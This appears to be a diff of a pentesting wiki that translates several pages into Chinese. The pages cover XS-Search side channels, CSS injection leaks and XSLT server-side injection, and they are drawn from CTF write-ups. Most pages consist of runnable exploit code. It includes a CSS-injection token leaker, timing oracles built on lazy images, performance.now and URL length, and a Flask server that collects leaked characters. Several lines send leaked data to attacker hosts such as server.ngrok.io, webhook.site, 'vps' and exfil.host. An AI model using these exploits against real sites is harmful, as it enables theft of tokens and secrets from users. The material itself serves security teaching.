+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c", "d", "e", "f"]
+.map(
+(e) =>
+'input[value$="' +
+e +
+postfix +
+'"]{--e' +
+n +
+":url(" +
+HOSTNAME +
+"/leak?post=" +
+e +
+postfix +
+")}"
+)
+.join("") +
+"div ".repeat(n) +
+"input{background:var(--e" +
+n +
+")}" +
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c", "d", "e", "f"]
+.map(
+(e) =>
+'input[value^="' +
+prefix +
+e +
+'"]{--s' +
+n +
+":url(" +
+HOSTNAME +
+"/leak?pre=" +
+prefix +
+e +
+")}"
+)
+.join("") +
+"div ".repeat(n) +
+"input{border-image:var(--s" +
+n +
+")}" +
+"input[value=" +
+prefix +
+postfix +
+"]{list-style:url(" +
+HOSTNAME +
+"/end?token=" +
+prefix +
+postfix +
+"&)};"
 
-  response.writeHead(200, { "Content-Type": "text/css" })
-  response.write(css)
-  response.end()
-  n++
+response.writeHead(200, { "Content-Type": "text/css" })
+response.write(css)
+response.end()
+n++
 }
 
 // Server listening
 const server = http.createServer(requestHandler)
 
 server.listen(port, (err) => {
-  if (err) {
-    return console.log("[-] Error: something bad happened", err)
-  }
-  console.log("[+] Server is listening on %d", port)
+if (err) {
+return console.log("[-] Error: something bad happened", err)
+}
+console.log("[+] Server is listening on %d", port)
 })
 
 function log() {
-  if (DEBUG) console.log.apply(console, arguments)
+if (DEBUG) console.log.apply(console, arguments)
 }
 
 /*
@@ -278,6 +277,4 @@ input{border-image:var(--s0)}
 input[value=]{list-style:url(http://localhost:5001/end?token=&)};
 */
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
index 72861a35a..648a30cca 100644
--- a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
+++ b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
@@ -1,157 +1,154 @@
-# Event Loop Blocking + Lazy images
+# 事件循环阻塞 + 懒加载图片
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In [**this exploit**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410) mixes the **lazy image side channel** technique through a HTML injection with kind of **event loop blocking technique** to leak chars.
+在 [**这个漏洞**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45)，[**@aszx87410**](https://twitter.com/aszx87410) 通过 HTML 注入混合了 **懒加载图片侧信道** 技术和某种 **事件循环阻塞技术** 来泄露字符。
 
-This is a **different exploit for the CTF chall** that was already commented in the following page. take a look for more info about the challenge:
+这是一个 **不同的漏洞**，用于 CTF 挑战，已经在以下页面中评论过。有关挑战的更多信息，请查看：
 
 {{#ref}}
 connection-pool-example.md
 {{#endref}}
 
-The idea behind this exploit is:
+这个漏洞背后的想法是：
 
-- The posts are loaded alphabetically
-- An **attacker** can **inject** a **post** starting with **"A"**, then some **HTML tag** (like a big **`<canvas`**) will fulfil most of the **screen** and some final **`<img lazy` tags** to load things.
-- If instead of an "A" the **attacker injects the same post but starting with a "z".** The **post** with the **flag** will appear **first**, then the **injected** **post** will appear with the initial "z" and the **big** **canvas**. Because the post with the flag appeared first, the first canvas will occupy all the screen and the final **`<img lazy`** tags injected **won't be seen** in the screen, so they **won't be loaded**.
-- Then, **while** the bot is **accessing** the page, the **attacker** will **send fetch requests**.&#x20;
-  - If the **images** injected in the post are being **loaded**, these **fetch** requests will take **longer**, so the attacker knows that the **post is before the flag** (alphabetically).
-  - If the the **fetch** requests are **fast**, it means that the **post** is **alphabetically** **after** the flag.
-
-Let's check the code:
+- 帖子按字母顺序加载
+- 一个 **攻击者** 可以 **注入** 一个以 **"A"** 开头的 **帖子**，然后一些 **HTML 标签**（如一个大的 **`<canvas`**）将占据大部分 **屏幕**，以及一些最终的 **`<img lazy` 标签** 来加载内容。
+- 如果攻击者注入的帖子是以 **"z"** 开头的同一个帖子，带有 **标志** 的 **帖子** 将会 **首先出现**，然后 **注入的** **帖子** 将以初始的 "z" 和 **大** **canvas** 出现。因为带有标志的帖子首先出现，第一个 canvas 将占据整个屏幕，最终注入的 **`<img lazy`** 标签将 **不会在** 屏幕上 **显示**，因此它们 **不会被加载**。
+- 然后，**当** 机器人 **访问** 页面时，**攻击者** 将 **发送获取请求**。&#x20;
+- 如果注入的 **图片** 正在 **加载**，这些 **获取** 请求将需要 **更长时间**，因此攻击者知道 **帖子在标志之前**（按字母顺序）。
+- 如果 **获取** 请求 **很快**，这意味着 **帖子** 在标志 **之后**（按字母顺序）。
 
+让我们检查代码：
 ```html
 <!DOCTYPE html>
 <html>
-  <!--
-  The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
-  If images are loading, the request to "/" is slower, otherwise faster.
-  By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
-  We can use fetch to measure the request time.
+<!--
+The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
+If images are loading, the request to "/" is slower, otherwise faster.
+By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
+We can use fetch to measure the request time.
 -->
-  <body>
-    <button onclick="run()">start</button>
+<body>
+<button onclick="run()">start</button>
 
-    <!-- Inject post with payload -->
-    <form
-      id="f"
-      action="http://localhost:1234/create"
-      method="POST"
-      target="_blank">
-      <input id="inp" name="text" value="" />
-    </form>
+<!-- Inject post with payload -->
+<form
+id="f"
+action="http://localhost:1234/create"
+method="POST"
+target="_blank">
+<input id="inp" name="text" value="" />
+</form>
 
-    <!-- Remove index -->
-    <form
-      id="f2"
-      action="http://localhost:1234/remove"
-      method="POST"
-      target="_blank">
-      <input id="inp2" name="index" value="" />
-    </form>
+<!-- Remove index -->
+<form
+id="f2"
+action="http://localhost:1234/remove"
+method="POST"
+target="_blank">
+<input id="inp2" name="index" value="" />
+</form>
 
-    <script>
-      let flag = "SEKAI{"
-      const TARGET = "https://safelist.ctf.sekai.team"
-      f.action = TARGET + "/create"
-      f2.action = TARGET + "/remove"
+<script>
+let flag = "SEKAI{"
+const TARGET = "https://safelist.ctf.sekai.team"
+f.action = TARGET + "/create"
+f2.action = TARGET + "/remove"
 
-      const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
-      // Function to leak info to attacker
-      const send = (data) => fetch("http://server.ngrok.io?d=" + data)
-      const charset = "abcdefghijklmnopqrstuvwxyz".split("")
+const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
+// Function to leak info to attacker
+const send = (data) => fetch("http://server.ngrok.io?d=" + data)
+const charset = "abcdefghijklmnopqrstuvwxyz".split("")
 
-      // start exploit
-      let count = 0
-      setTimeout(async () => {
-        let L = 0
-        let R = charset.length - 1
+// start exploit
+let count = 0
+setTimeout(async () => {
+let L = 0
+let R = charset.length - 1
 
-        // I have omited code here as apparently it wasn't necesary
+// I have omited code here as apparently it wasn't necesary
 
-        // fallback to linerar since I am not familiar with binary search lol
-        for (let i = R; i >= L; i--) {
-          let c = charset[i]
-          send("try_" + flag + c)
-          const found = await testChar(flag + c)
-          if (found) {
-            send("found: " + flag + c)
-            flag += c
-            break
-          }
-        }
-      }, 0)
+// fallback to linerar since I am not familiar with binary search lol
+for (let i = R; i >= L; i--) {
+let c = charset[i]
+send("try_" + flag + c)
+const found = await testChar(flag + c)
+if (found) {
+send("found: " + flag + c)
+flag += c
+break
+}
+}
+}, 0)
 
-      async function testChar(str) {
-        return new Promise((resolve) => {
-          /*
-            For 3350, you need to test it on your local to get this number.
-            The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
-            If starts with "A", the image should be loaded because it's in the threshold.
-          */
-          // <canvas height="3350px"> is experimental and allow to show the injected
-          // images when the post injected is the first one but to hide them when
-          // the injected post is after the post with the flag
-          inp.value =
-            str +
-            '<br><canvas height="3350px"></canvas><br>' +
-            Array.from({ length: 20 })
-              .map((_, i) => `<img loading=lazy src=/?${i}>`)
-              .join("")
-          f.submit()
+async function testChar(str) {
+return new Promise((resolve) => {
+/*
+For 3350, you need to test it on your local to get this number.
+The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
+If starts with "A", the image should be loaded because it's in the threshold.
+*/
+// <canvas height="3350px"> is experimental and allow to show the injected
+// images when the post injected is the first one but to hide them when
+// the injected post is after the post with the flag
+inp.value =
+str +
+'<br><canvas height="3350px"></canvas><br>' +
+Array.from({ length: 20 })
+.map((_, i) => `<img loading=lazy src=/?${i}>`)
+.join("")
+f.submit()
 
-          setTimeout(() => {
-            run(str, resolve)
-          }, 500)
-        })
-      }
+setTimeout(() => {
+run(str, resolve)
+}, 500)
+})
+}
 
-      async function run(str, resolve) {
-        // Open posts page 5 times
-        for (let i = 1; i <= 5; i++) {
-          window.open(TARGET)
-        }
+async function run(str, resolve) {
+// Open posts page 5 times
+for (let i = 1; i <= 5; i++) {
+window.open(TARGET)
+}
 
-        let t = 0
-        const round = 30 //Lets time 30 requests
-        setTimeout(async () => {
-          // Send 30 requests and time each
-          for (let i = 0; i < round; i++) {
-            let s = performance.now()
-            await fetch(TARGET + "/?test", {
-              mode: "no-cors",
-            }).catch((err) => 1)
-            let end = performance.now()
-            t += end - s
-            console.log(end - s)
-          }
-          const avg = t / round
-          // Send info about how much time it took
-          send(str + "," + t + "," + "avg:" + avg)
+let t = 0
+const round = 30 //Lets time 30 requests
+setTimeout(async () => {
+// Send 30 requests and time each
+for (let i = 0; i < round; i++) {
+let s = performance.now()
+await fetch(TARGET + "/?test", {
+mode: "no-cors",
+}).catch((err) => 1)
+let end = performance.now()
+t += end - s
+console.log(end - s)
+}
+const avg = t / round
+// Send info about how much time it took
+send(str + "," + t + "," + "avg:" + avg)
 
-          /*
-          I get this threshold(1000ms) by trying multiple times on remote admin bot
-          for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
-        */
-          const isFound = t >= 1000
-          if (isFound) {
-            inp2.value = "0"
-          } else {
-            inp2.value = "1"
-          }
+/*
+I get this threshold(1000ms) by trying multiple times on remote admin bot
+for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
+*/
+const isFound = t >= 1000
+if (isFound) {
+inp2.value = "0"
+} else {
+inp2.value = "1"
+}
 
-          // remember to delete the post to not break our leak oracle
-          f2.submit()
-          setTimeout(() => {
-            resolve(isFound)
-          }, 200)
-        }, 200)
-      }
-    </script>
-  </body>
+// remember to delete the post to not break our leak oracle
+f2.submit()
+setTimeout(() => {
+resolve(isFound)
+}, 200)
+}, 200)
+}
+</script>
+</body>
 </html>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/javascript-execution-xs-leak.md b/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
index 9a758a00b..ea8645d79 100644
--- a/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
+++ b/src/pentesting-web/xs-search/javascript-execution-xs-leak.md
@@ -1,74 +1,69 @@
-# JavaScript Execution XS Leak
+# JavaScript 执行 XS 漏洞
 
 {{#include ../../banners/hacktricks-training.md}}
-
 ```javascript
 // Code that will try ${guess} as flag (need rest of the server code
 app.get("/guessing", function (req, res) {
-  let guess = req.query.guess
-  let page = `<html>
-                <head>
-                    <script>
-                            function foo() {
-                                // If not the flag this will be executed
-                                window.parent.foo()
-                            }
-                        </script>
-                    <script src="https://axol.space/search?query=${guess}&hint=foo()"></script>
-                </head>
-                <p>hello2</p>
-                </html>`
-  res.send(page)
+let guess = req.query.guess
+let page = `<html>
+<head>
+<script>
+function foo() {
+// If not the flag this will be executed
+window.parent.foo()
+}
+</script>
+<script src="https://axol.space/search?query=${guess}&hint=foo()"></script>
+</head>
+<p>hello2</p>
+</html>`
+res.send(page)
 })
 ```
-
-Main page that generates iframes to the previous `/guessing` page to test each possibility
-
+生成 iframe 的主页面，指向之前的 `/guessing` 页面以测试每种可能性
 ```html
 <html>
-  <head>
-    <script>
-      let candidateIsGood = false
-      let candidate = ""
-      let flag = "bi0sctf{"
-      let guessIndex = -1
+<head>
+<script>
+let candidateIsGood = false
+let candidate = ""
+let flag = "bi0sctf{"
+let guessIndex = -1
 
-      let flagChars =
-        "_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+let flagChars =
+"_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ"
 
-      // this will get called from our iframe IF the candidate is WRONG
-      function foo() {
-        candidateIsGood = false
-      }
+// this will get called from our iframe IF the candidate is WRONG
+function foo() {
+candidateIsGood = false
+}
 
-      timerId = setInterval(() => {
-        if (candidateIsGood) {
-          flag = candidate
-          guessIndex = -1
-          fetch("https://webhook.site/<yours-goes-here>?flag=" + flag)
-        }
+timerId = setInterval(() => {
+if (candidateIsGood) {
+flag = candidate
+guessIndex = -1
+fetch("https://webhook.site/<yours-goes-here>?flag=" + flag)
+}
 
-        //Start with true and will be change to false if wrong
-        candidateIsGood = true
-        guessIndex++
-        if (guessIndex >= flagChars.length) {
-          fetch("https://webhook.site/<yours-goes-here>")
-          return
-        }
-        let guess = flagChars[guessIndex]
-        candidate = flag + guess
-        let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(
-          candidate
-        )}"></iframe>`
-        console.log("iframe: ", iframe)
-        hack.innerHTML = iframe
-      }, 500)
-    </script>
-  </head>
-  <p>hello</p>
-  <div id="hack"></div>
+//Start with true and will be change to false if wrong
+candidateIsGood = true
+guessIndex++
+if (guessIndex >= flagChars.length) {
+fetch("https://webhook.site/<yours-goes-here>")
+return
+}
+let guess = flagChars[guessIndex]
+candidate = flag + guess
+let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(
+candidate
+)}"></iframe>`
+console.log("iframe: ", iframe)
+hack.innerHTML = iframe
+}, 500)
+</script>
+</head>
+<p>hello</p>
+<div id="hack"></div>
 </html>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
index 0c6db5caf..92cff9f8e 100644
--- a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
+++ b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
@@ -2,105 +2,102 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Exploit taken from [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
+**从 [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/) 获取的漏洞**
 
-In this challenge the user could sent thousands of chars and if the flag was contained, the chars would be sent back to the bot. So putting a big amount of chars the attacker could measure if the flag was containing in the sent string or not.
+在这个挑战中，用户可以发送数千个字符，如果标志包含在内，这些字符将被发送回机器人。因此，通过发送大量字符，攻击者可以测量标志是否包含在发送的字符串中。
 
 > [!WARNING]
-> Initially, I didn’t set object width and height, but later on, I found that it’s important because the default size is too small to make a difference in the load time.
-
+> 起初，我没有设置对象的宽度和高度，但后来我发现这很重要，因为默认大小太小，无法在加载时间上产生差异。
 ```html
 <!DOCTYPE html>
 <html>
-  <head> </head>
-  <body>
-    <img src="https://deelay.me/30000/https://example.com" />
-    <script>
-      fetch("https://deelay.me/30000/https://example.com")
+<head> </head>
+<body>
+<img src="https://deelay.me/30000/https://example.com" />
+<script>
+fetch("https://deelay.me/30000/https://example.com")
 
-      function send(data) {
-        fetch("http://vps?data=" + encodeURIComponent(data)).catch((err) => 1)
-      }
+function send(data) {
+fetch("http://vps?data=" + encodeURIComponent(data)).catch((err) => 1)
+}
 
-      function leak(char, callback) {
-        return new Promise((resolve) => {
-          let ss = "just_random_string"
-          let url =
-            `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=` +
-            ss[Math.floor(Math.random() * ss.length)].repeat(1000000)
-          let start = performance.now()
-          let object = document.createElement("object")
-          object.width = "2000px"
-          object.height = "2000px"
-          object.data = url
-          object.onload = () => {
-            object.remove()
-            let end = performance.now()
-            resolve(end - start)
-          }
-          object.onerror = () => console.log("Error event triggered")
-          document.body.appendChild(object)
-        })
-      }
+function leak(char, callback) {
+return new Promise((resolve) => {
+let ss = "just_random_string"
+let url =
+`http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=` +
+ss[Math.floor(Math.random() * ss.length)].repeat(1000000)
+let start = performance.now()
+let object = document.createElement("object")
+object.width = "2000px"
+object.height = "2000px"
+object.data = url
+object.onload = () => {
+object.remove()
+let end = performance.now()
+resolve(end - start)
+}
+object.onerror = () => console.log("Error event triggered")
+document.body.appendChild(object)
+})
+}
 
-      send("start")
+send("start")
 
-      let charset = "abcdefghijklmnopqrstuvwxyz_}".split("")
-      let flag = "justCTF{"
+let charset = "abcdefghijklmnopqrstuvwxyz_}".split("")
+let flag = "justCTF{"
 
-      async function main() {
-        let found = 0
-        let notFound = 0
-        for (let i = 0; i < 3; i++) {
-          await leak("..")
-        }
-        for (let i = 0; i < 3; i++) {
-          found += await leak("justCTF")
-        }
-        for (let i = 0; i < 3; i++) {
-          notFound += await leak("NOT_FOUND123")
-        }
+async function main() {
+let found = 0
+let notFound = 0
+for (let i = 0; i < 3; i++) {
+await leak("..")
+}
+for (let i = 0; i < 3; i++) {
+found += await leak("justCTF")
+}
+for (let i = 0; i < 3; i++) {
+notFound += await leak("NOT_FOUND123")
+}
 
-        found /= 3
-        notFound /= 3
+found /= 3
+notFound /= 3
 
-        send("found flag:" + found)
-        send("not found flag:" + notFound)
+send("found flag:" + found)
+send("not found flag:" + notFound)
 
-        let threshold = found - (found - notFound) / 2
-        send("threshold:" + threshold)
+let threshold = found - (found - notFound) / 2
+send("threshold:" + threshold)
 
-        if (notFound > found) {
-          return
-        }
+if (notFound > found) {
+return
+}
 
-        // exploit
-        while (true) {
-          if (flag[flag.length - 1] === "}") {
-            break
-          }
-          for (let char of charset) {
-            let trying = flag + char
-            let time = 0
-            for (let i = 0; i < 3; i++) {
-              time += await leak(trying)
-            }
-            time /= 3
-            send("char:" + trying + ",time:" + time)
-            if (time >= threshold) {
-              flag += char
-              send(flag)
-              break
-            }
-          }
-        }
-      }
+// exploit
+while (true) {
+if (flag[flag.length - 1] === "}") {
+break
+}
+for (let char of charset) {
+let trying = flag + char
+let time = 0
+for (let i = 0; i < 3; i++) {
+time += await leak(trying)
+}
+time /= 3
+send("char:" + trying + ",time:" + time)
+if (time >= threshold) {
+flag += char
+send(flag)
+break
+}
+}
+}
+}
 
-      main()
-    </script>
-  </body>
+main()
+</script>
+</body>
 </html>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/performance.now-example.md b/src/pentesting-web/xs-search/performance.now-example.md
index bf1727a86..dc4cfeea0 100644
--- a/src/pentesting-web/xs-search/performance.now-example.md
+++ b/src/pentesting-web/xs-search/performance.now-example.md
@@ -1,58 +1,55 @@
-# performance.now example
+# performance.now 示例
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Example taken from [https://ctf.zeyu2001.com/2022/nitectf-2022/js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/js-api)**
-
+**示例来自 [https://ctf.zeyu2001.com/2022/nitectf-2022/js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/js-api)**
 ```javascript
 const sleep = (ms) => new Promise((res) => setTimeout(res, ms))
 
 async function check(flag) {
-  let w = frame.contentWindow
-  w.postMessage(
-    { op: "preview", payload: '<img name="enable_experimental_features">' },
-    "*"
-  )
-  await sleep(1)
-  w.postMessage({ op: "search", payload: flag }, "*")
-  let t1 = performance.now()
-  await sleep(1)
-  return performance.now() - t1 > 200
+let w = frame.contentWindow
+w.postMessage(
+{ op: "preview", payload: '<img name="enable_experimental_features">' },
+"*"
+)
+await sleep(1)
+w.postMessage({ op: "search", payload: flag }, "*")
+let t1 = performance.now()
+await sleep(1)
+return performance.now() - t1 > 200
 }
 
 async function main() {
-  let alpha =
-    "abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}"
-  window.frame = document.createElement("iframe")
-  frame.width = "100%"
-  frame.height = "700px"
-  frame.src = "https://challenge.jsapi.tech/"
-  document.body.appendChild(frame)
-  await sleep(1000)
+let alpha =
+"abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}"
+window.frame = document.createElement("iframe")
+frame.width = "100%"
+frame.height = "700px"
+frame.src = "https://challenge.jsapi.tech/"
+document.body.appendChild(frame)
+await sleep(1000)
 
-  let flag = "nite{"
-  while (1) {
-    for (let c of alpha) {
-      let result = await Promise.race([
-        check(flag + c),
-        new Promise((res) =>
-          setTimeout(() => {
-            res(true)
-          }, 300)
-        ),
-      ])
-      console.log(flag + c, result)
-      if (result) {
-        flag += c
-        break
-      }
-    }
-    new Image().src = "//exfil.host/log?" + encodeURIComponent(flag)
-  }
+let flag = "nite{"
+while (1) {
+for (let c of alpha) {
+let result = await Promise.race([
+check(flag + c),
+new Promise((res) =>
+setTimeout(() => {
+res(true)
+}, 300)
+),
+])
+console.log(flag + c, result)
+if (result) {
+flag += c
+break
+}
+}
+new Image().src = "//exfil.host/log?" + encodeURIComponent(flag)
+}
 }
 
 document.addEventListener("DOMContentLoaded", main)
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/url-max-length-client-side.md b/src/pentesting-web/xs-search/url-max-length-client-side.md
index 50a6b32d7..ae490c66a 100644
--- a/src/pentesting-web/xs-search/url-max-length-client-side.md
+++ b/src/pentesting-web/xs-search/url-max-length-client-side.md
@@ -1,47 +1,44 @@
-# URL Max Length - Client Side
+# URL 最大长度 - 客户端
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Code from [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
-
+来自 [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit) 的代码
 ```html
 <html>
-  <body></body>
-  <script>
-    ;(async () => {
-      const curr = "http://secrets.wtl.pw/search?query=HackTM{"
+<body></body>
+<script>
+;(async () => {
+const curr = "http://secrets.wtl.pw/search?query=HackTM{"
 
-      const leak = async (char) => {
-        fetch("/?try=" + char)
-        let w = window.open(
-          curr + char + "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2)
-        )
+const leak = async (char) => {
+fetch("/?try=" + char)
+let w = window.open(
+curr + char + "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2)
+)
 
-        const check = async () => {
-          try {
-            w.origin
-          } catch {
-            fetch("/?nope=" + char)
-            return
-          }
-          setTimeout(check, 100)
-        }
-        check()
-      }
+const check = async () => {
+try {
+w.origin
+} catch {
+fetch("/?nope=" + char)
+return
+}
+setTimeout(check, 100)
+}
+check()
+}
 
-      const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
+const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
 
-      for (let i = 0; i < CHARSET.length; i++) {
-        leak(CHARSET[i])
-        await new Promise((resolve) => setTimeout(resolve, 50))
-      }
-    })()
-  </script>
+for (let i = 0; i < CHARSET.length; i++) {
+leak(CHARSET[i])
+await new Promise((resolve) => setTimeout(resolve, 50))
+}
+})()
+</script>
 </html>
 ```
-
-Server side:
-
+服务器端：
 ```python
 from flask import Flask, request
 
@@ -52,25 +49,23 @@ chars = []
 
 @app.route('/', methods=['GET'])
 def index():
-    global chars
+global chars
 
-    nope = request.args.get('nope', '')
-    if nope:
-        chars.append(nope)
+nope = request.args.get('nope', '')
+if nope:
+chars.append(nope)
 
-    remaining = [c for c in CHARSET if c not in chars]
+remaining = [c for c in CHARSET if c not in chars]
 
-    print("Remaining: {}".format(remaining))
+print("Remaining: {}".format(remaining))
 
-    return "OK"
+return "OK"
 
 @app.route('/exploit.html', methods=['GET'])
 def exploit():
-    return open('exploit.html', 'r').read()
+return open('exploit.html', 'r').read()
 
 if __name__ == '__main__':
-    app.run(host='0.0.0.0', port=1337)
+app.run(host='0.0.0.0', port=1337)
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
index d4f2d7d00..89ccf7fab 100644
--- a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
+++ b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
@@ -1,21 +1,20 @@
-# XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
+# XSLT 服务器端注入（可扩展样式表语言转换）
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-XSLT is a technology employed for transforming XML documents into different formats. It comes in three versions: 1, 2, and 3, with version 1 being the most commonly utilized. The transformation process can be executed either on the server or within the browser.
+XSLT 是一种用于将 XML 文档转换为不同格式的技术。它有三个版本：1、2 和 3，其中版本 1 是最常用的。转换过程可以在服务器上或浏览器中执行。
 
-The frameworks that are most frequently used include:
+最常用的框架包括：
 
-- **Libxslt** from Gnome,
-- **Xalan** from Apache,
-- **Saxon** from Saxonica.
+- **Libxslt** 来自 Gnome，
+- **Xalan** 来自 Apache，
+- **Saxon** 来自 Saxonica。
 
-For the exploitation of vulnerabilities associated with XSLT, it is necessary for xsl tags to be stored on the server side, followed by accessing that content. An illustration of such a vulnerability is documented in the following source: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).
-
-## Example - Tutorial
+要利用与 XSLT 相关的漏洞，必须将 xsl 标签存储在服务器端，然后访问该内容。以下来源记录了此类漏洞的示例：[https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)。
 
+## 示例 - 教程
 ```bash
 sudo apt-get install default-jdk
 sudo apt-get install libsaxonb-java libsaxon-java
@@ -24,13 +23,13 @@ sudo apt-get install libsaxonb-java libsaxon-java
 ```xml:xml.xml
 <?xml version="1.0" encoding="UTF-8"?>
 <catalog>
-    <cd>
-        <title>CD Title</title>
-        <artist>The artist</artist>
-        <company>Da Company</company>
-        <price>10000</price>
-        <year>1760</year>
-    </cd>
+<cd>
+<title>CD Title</title>
+<artist>The artist</artist>
+<company>Da Company</company>
+<price>10000</price>
+<year>1760</year>
+</cd>
 </catalog>
 ```
 
@@ -38,91 +37,83 @@ sudo apt-get install libsaxonb-java libsaxon-java
 <?xml version="1.0" encoding="UTF-8"?>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 <xsl:template match="/">
-    <html>
-    <body>
-    <h2>The Super title</h2>
-    <table border="1">
-        <tr bgcolor="#9acd32">
-            <th>Title</th>
-            <th>artist</th>
-        </tr>
-        <tr>
-        <td><xsl:value-of select="catalog/cd/title"/></td>
-        <td><xsl:value-of select="catalog/cd/artist"/></td>
-        </tr>
-    </table>
-    </body>
-    </html>
+<html>
+<body>
+<h2>The Super title</h2>
+<table border="1">
+<tr bgcolor="#9acd32">
+<th>Title</th>
+<th>artist</th>
+</tr>
+<tr>
+<td><xsl:value-of select="catalog/cd/title"/></td>
+<td><xsl:value-of select="catalog/cd/artist"/></td>
+</tr>
+</table>
+</body>
+</html>
 </xsl:template>
 </xsl:stylesheet>
 ```
-
-Execute:
-
+执行：
 ```xml
 saxonb-xslt -xsl:xsl.xsl xml.xml
 
 Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:
-  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
 <html>
-   <body>
-      <h2>The Super title</h2>
-      <table border="1">
-         <tr bgcolor="#9acd32">
-            <th>Title</th>
-            <th>artist</th>
-         </tr>
-         <tr>
-            <td>CD Title</td>
-            <td>The artist</td>
-         </tr>
-      </table>
-   </body>
+<body>
+<h2>The Super title</h2>
+<table border="1">
+<tr bgcolor="#9acd32">
+<th>Title</th>
+<th>artist</th>
+</tr>
+<tr>
+<td>CD Title</td>
+<td>The artist</td>
+</tr>
+</table>
+</body>
 </html>
 ```
-
-### Fingerprint
-
+### 指纹
 ```xml:detection.xsl
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 <xsl:template match="/">
- Version: <xsl:value-of select="system-property('xsl:version')" /><br />
- Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
- Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
- <xsl:if test="system-property('xsl:product-name')">
- Product Name: <xsl:value-of select="system-property('xsl:product-name')" /><br />
- </xsl:if>
- <xsl:if test="system-property('xsl:product-version')">
- Product Version: <xsl:value-of select="system-property('xsl:product-version')" /><br />
- </xsl:if>
- <xsl:if test="system-property('xsl:is-schema-aware')">
- Is Schema Aware ?: <xsl:value-of select="system-property('xsl:is-schema-aware')" /><br />
- </xsl:if>
- <xsl:if test="system-property('xsl:supports-serialization')">
